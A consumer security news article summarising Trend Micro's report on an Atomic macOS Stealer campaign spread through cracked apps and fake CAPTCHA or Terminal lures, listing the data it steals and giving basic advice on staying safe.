Hackers are once again setting their sights on MacBooks and other Apple computers, deploying sophisticated malware capable of stealing passwords, files, browser data, and much more.
According to Infosecurity Magazine, cybersecurity firm Trend Micro has identified a new Atomic macOS Stealer campaign. Attackers are spreading malware by tricking users into downloading pirated or “cracked” versions of popular macOS applications. In cases where this fails, cybercriminals rely on fake CAPTCHA prompts to compromise unsuspecting victims.
While many assume Macs are safer than Windows laptops, the reality is different. Apple devices are now prime targets, as hackers see premium Mac users as lucrative victims.
Trend Micro’s report explains that the attack begins when a user downloads what appears to be a cracked app. Once installed, this Trojanized software secretly delivers the Atomic macOS Stealer onto the system.
Cybercriminals distribute these fake apps through forums, malicious ads, or even social media messages. Victims are typically redirected to fraudulent websites with buttons like “Download for macOS.”
In one case, users who attempted to download a cracked version of CleanMyMac ended up installing the Atomic macOS Stealer. Although the site looked legitimate at first, clicking “Download Now” redirected them to a hacker-controlled landing page.
In other scenarios, victims are asked to run commands in Apple Terminal, triggering a malicious installation script. This script creates a binary file, enabling persistence and data theft on the infected Mac.
Once installed, the malware collects and transmits sensitive information to a hacker-controlled server, including:
- System profile details
- Usernames and password
- Browser data (cookies, web history, login credentials)
- Cryptocurrency wallet info
- Telegram data
- OpenVPN profiles
- Keychain and Apple Notes data
- Files from local folders
This stolen data can be exploited directly in future attacks or sold on the dark web to other cybercriminals.
How to Stay Safe
To reduce risk, experts stress the importance of downloading apps only from the Apple App Store or directly from trusted developer websites. Be cautious of URLs with typos, poor grammar, or suspicious ads at the top of search results.
Avoid cracked or pirated apps altogether—beyond harming developers, they often serve as malware carriers. Even if the app functions, hidden malicious code may still steal your data or compromise your system.
Although macOS includes Gatekeeper and XProtect for built-in protection, using reputable third-party Mac antivirus software is strongly recommended. Many premium antivirus tools also include VPNs and password managers for added security.
Despite the outdated belief that “Macs don’t get viruses,” hackers continue to exploit complacency. Staying vigilant online—especially when downloading apps—is the best defense.